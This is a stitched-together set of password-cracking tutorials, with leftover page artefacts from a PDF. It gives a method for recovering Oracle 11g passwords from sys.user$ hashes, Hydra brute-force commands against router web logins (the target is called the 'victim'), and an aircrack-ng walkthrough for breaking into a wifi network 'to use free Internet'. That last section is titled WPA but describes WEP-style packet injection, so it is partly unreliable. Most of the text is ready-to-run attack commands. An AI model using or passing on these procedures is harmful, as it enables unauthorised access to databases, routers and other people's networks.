How to Cracking Oracle 11g


Download Windows Binary: thc-orakelcrackert11g.tar.gz

OrakelCrackert 1.00 released 20070926
=====================================
OrakelCrackert is an Oracle 11g database password hash cracker using a 
weakness in the Oracle password storage strategy. With Oracle 11g, case 
sensitive SHA1 based hashing is introduced. Storing passwords in a case 
sensitive way introduces more possible password combinations so 
password cracking takes longer. For example, the number of possible 
password combinations using a password generated out of the character 
set "[a-z][A-Z][0-9]#$_" where passwords start with a alpha character 
using is 52/65 * 65 ^ passlength. For an 8 position password this means 
254.915.850.312.500 combinations.

Since Oracle is still storing the DES based password hashes, an attack 
much faster than brute forcing can be launched for most (not all) 
passwords. To do so:

1 - Get both the Oralce < 11g and 11g password hash, for example by 
executing the query "select user, password, spare4 from sys.user$ where 
username = ".

2 - Crack the old DES based password hash (field "password") which is 
generated using the upper case version of the mixed case password 
(note: this is not applicable to all possible passwords in Oracle 11g).

3 - If the upper case password is found, calculate the SHA1 result of 
the ASCII value of the password followed by the salt (nibble 41-60 of 
field SPARE4) to the SHA1 based password hash (nibble 1-40 of field 
SPARE4). Do this for every upper/lower case combination possible until 
you have got a match.

4 - Voila!

Using a password generated out of the character set 
"[a-z][A-Z][0-9]#$_" where passwords start with a alpha character 
(currently supported by OrakelCrackert), the number of password 
combinations shrinks to 26/39 * 39 ^ length (= step 2) + 2 ^ length (= 
step 3). A full brute force for an 8 position password will now at 
maximum 'just' take 3.568.006.173.910 tries. This is about 77 times 
less than the original value.

Example:
========
select name, password, spare4 from sys.user$ where name = 'THC';
THC,435D0D3C8468DBC4,S:D39F4CC16573323279E5E4E16D359D6C55DCC09202B03D5D74B6841CEA2E

USER_PASS = ASCII(USER + GUESSED_PASS)
PASS_UPPER = ORACLEHASH(GUESSES_PASS)
FOR(ALL UPPER/LOWER CASE COMBINATIONS)
	PASS_SALT = ASCII(PASS + SALT)
	GUESSED_CASE = SHA1(PASS_SALT)
	IF(GUESSED_CASE == SPARE4)
		DONE!

With real-life data:
USER_PASS = ASCII(THC + THC#) = 0x54484354484323
PASS_UPPER = ORACLEHASH(0x54484354484323) = 0x435D0D3C8468DBC4
FOR LOOP (only the correct guess):
	PASS_SALT = ASCI(tHC# + 0x02B03D5D74B6841CEA2E) = 
0x7448432302B03D5D74B6841CEA2E
	GUESSED_CASE = SHA1(0x7448432302B03D5D74B6841CEA2E) = 
0xD39F4CC16573323279E5E4E16D359D6C55DCC092
	IF(0xD39F4CC16573323279E5E4E16D359D6C55DCC092 == 
0xD39F4CC16573323279E5E4E16D359D6C55DCC092)
		WE'VE GOT HIM!'

How to use Hydra

Say you have wireless router to which you have forgotten the password. The easiest thing to do in this case is
to reset the router to factory defaults. However if you have a lot of custom settings and your backup is
nonexistent, out-dated, corrupted, or the backup restored a password which you do not remember, you can
try a brute force attack on the router. From http://freeworld.thc.org/thc-hydra/. Hydra currently supports:
TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, LDAP2, LADP3,
SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH,
SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, SSH2, Teamspeak, Cisco auth, Cisco enable,
Cisco AAA (incorporated in telnet module)
For the sake of this document I will use a Linksys WRT54GL, hardware v1.1, Linksys firmware 4.30.11 and
dd-wrt v2.4sp1. The first thing you have to do is find out if the device uses a username AND password to
login. Several devices only require a password to login into the device as admin, root, system, etc. The easiest
way to find this out is to goto the vendor’s website and download installation manual which willgive you this
information. For the Linksys firmware
boot BackTrack and login as root 1.
hydra -l “” -P wordlist.txt -f -v -e ns 192.168.1.1 http-get /
-l is for a username which is null in this case
-P is a wordlist of passwords to try
-f stop hydra when it finds the password
-v is for verbose
-e try no password and password the ip address of the device one of the currently supported options
192.168.1.1 is the IP of the AP
http-get is the correct option to this AP
/ is where you have to put in the username and password. In this case you have to put in the username
and password before you can do anything. You will have to figure this out for yourself as each device is
different.
2.
some other option you may need are:
-t TASKS run TASKS number of connects in parallel (default: 16)
You may have to adjust this number down as larger numbers may cause the router to crash or
misbehave. I usually use 10.
-v / -V verbose mode / show login+pass combination for each attempt
3.
As I said earlier, http-get is the correct option for my Linksys AP (with the factory firmware). When you goto
the AP website a dialog box opens and prompts for a username and password. Each AP is different and as
Cracking Passwords Version 1.1 file:///D:/password10.html
23 of 45 2/15/2010 3:48 PM
such you will have to change options as RaginRob found out. The following is a slightly modified version
from his tutorial.
I recently started playing around with Hydra and tried to hack my router. After searching the forum and
googling around a while I noticed that there are only some howto’s for routers that have http-auth
authentication. That is, when you go to 192.168.2.1 e.g. and before showing anything you have to enter login
and password in a popup. My router (T-Com Sinus 154 DSL Basic 3) and many others I’ve dealt with so far
work differently. When I want to login to my router, I have to go to 192.168.2.1, a web interface with a
password field shows up, and I have to enter the password which is then checked by /cgi-bin/login.exe via
http-post.
It was quite tricky to find out how to use this authentication with hydra, so I guess there are some of you that
can benefit from this. I’ll describe how I did it, so you can adapt the method and use it with your own router.
First of all I examined the login page of the web interface. Be sure to look at the frame source and not the
frameset. You should see the form and the action, here’s what I saw:
The form is defined as:
<form name=”tF” method=”post” action=”/cgi-bin/login.exe” onSubmit=”evaltF();”>
Somewhere in the form there will be the field that takes the password:
<input type=”password” name=”pws” class=”stylepwd” size=”12″ maxlength=”12″>
This is probably the most important data you need. You need to write down the field name (“pws” in my
case). The size attribute comes in very handy too because it tells us that the password’s max length is 12
characters.
After that I tried to get familiar with Hydra’s options. I figured out that you needthe following options:
hydra -l “” -P passwords.txt -t 1 -f -v -V 192.168.2.1 http-post-form /cgi-bin
/login.exe:pws=^PASS^:loginpserr.htm
-l Sets the login name. In the end I don’t need a login name but hydra gets kind of pissed when you don’tpass
something, so I gave an empty string.
-P The wordlist to use for the password
-t 1 task only, not really necessary, I just wanted to make sure Hydra doesn’t choke on too many requests -f
Hydra shall stop when a working password is found
-v be verbose. and even more. I skipped that in the final version but it’s ok for debugging
192.168.1.1 is victim’s ip
http-post-form the method to use
/cgi-bin/login.exe:pws=^PASS^:loginpserr.htm
This is the most important part. Here we tell Hydra what to pass the passwords to. The argument consists of
three parts separated by “:”.
The first part is the script that takes the POST data, we found that in the frame source above.
The second part is the field name of the password field with an added =^PASS^. ^PASS^ is the variable that
hydra substitutes with the passwords in the wordlist.
The third part is the “incorrect” condition. Hydra has to find out somehow if the current password that was
send to the router is correct or not. You have to find a string that is actually IN A NEGATIVE RESPONSE
from the router. As we don’t have the password yet we can’t know what the router will send if the password is
correct, therefore we have to check if it is NOT, which we can find out easily. To find out what the router
sends back to hydra I used Wireshark.
Cracking Passwords Version 1.1 file:///D:/password10.html
Open up wireshark, go to the router login page, start capturing and then login with a wrong password. After
that, stop capturing and apply a “http” filter. You will see the POST data sentfrom hydra to the router (you
should also see the “pws=blabla” in the details, that’s where hydra sends the passwords from the wordlist).
Below that you’ll find the router answer. In my case it says something like “This page has moved to
loginpserr.htm” packed in some basic HTML. So I used the string loginpserr.htm to validate the .. uhm…
faultyness. OMFG %-]
Hydra will consider a password as CORRECT when the router answer DOES NOT contain the given string.
So be sure to take an expression that somehow sounds like “incorrect” or “wrong”. If you took “the” for
example, and the POSITVE response would be something like “the password you entered was correct”, hydra
will not recognize it as correct but incorrect.
If your router does not only need a password but also a username, you can easily add the according login
name to the last part. So if you need to send the field “login” or whatever it is called in your case with the
value “admin” as the only username you could use
/cgi-bin/login.exe:login=admin&pws=^PASS^:loginpserr.htm
When you need to try a whole username list then you can specify the list via
-L usernames.txt
and
/cgi-bin/login.exe:login=^USER^&pws=^PASS^:loginpserr.htm
For dd-wrt do
boot BackTrack and login as root 1.
hydra -l admin -P wordlist.txt -f -e ns 192.168.1.1 http-get /login.asp
-l is for a username which is admin in this case. dd-wrt allows the user to chose the username that is
require to login to the device so it could be anything.
-P is a wordlist of passwords to try
-f stop hydra when it finds the password
-v is for verbose
-e try no password and password the ip address of the device one of the currently supported options
192.168.1.1 is the IP of the AP
http-get is the correct option to this AP
/ is where you have to put in the username and password. In this case you have to put in the username
and password before you can do anything. You will have to figure this out for yourself as each device is
different.
2.
some other option you may need are:
-t TASKS run TASKS number of connects in parallel (default: 16)
You may have to adjust this number down as larger numbers may cause the router to crash or
misbehave. I usually use 10.
-v / -V verbose mode / show login+pass combination for each attempt

END of hydra

How to crack a WPA encypted wifi Network.

 To crack a WPA encrypted wifi Network to use free Internet, you will need is compatible wifi card and backtrack 5.
First download Backtrack 5 from here.
Download the iso and burn it into a DVD or you can run on virtual Machine in this case i am using Vmware to Run backtrack.

So run the backtrack 5 after that you will see the Desktop then open command terminal and type “airmon-ng” this command will show your interface driver and chip set of your network card.

Then type this command “airmon-ng start wlan0” wlan0 is the name of my interface.

Then you will see at the bottom left corner (monitor mode enable on mon0) so i am using mon0 as my interface after that type this command “airodump-ng mon0” then i will start scanning for wifi networks, after that you will see bssid  channel, encryption, essid etc. my essid is “homenet” your will be different after that type this command “airodump-ng -c (channel) -w (file name) –bssid (bssid) mon0” type your bssid, channel and filename
e.g. airodump-ng -c 3 -w wep –bssid 00:18:01:a7:c0:00 mon0
then press enter

then data will flow slowly so to boost the data,
open up a new command terminal and type “aireplay-ng -1 0 -a (bssid) mon0” if you have strong signals coming from the wifi card the you will see this Association Successful

then type this “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0” then data will flow much faster if you see Use this  packet press y and press enter,

after that open a another command terminal and type “aircrack-ng (filename)*.cap” and press enter, then it will try to crack it now. Then it will say Key found and the key is 12:34:56 coll ans are not the part of the password so remove it.

so Know you have the wireless password Remember to use this Knowledge for good not for evil be ethical.

Commands that i have used

1)airmon-ng
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) –bssid (bssid) mon0
5)aireplay-ng -1 0 -a (bssid) mon0
6)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
7)aircrack-ng (filename)*.cap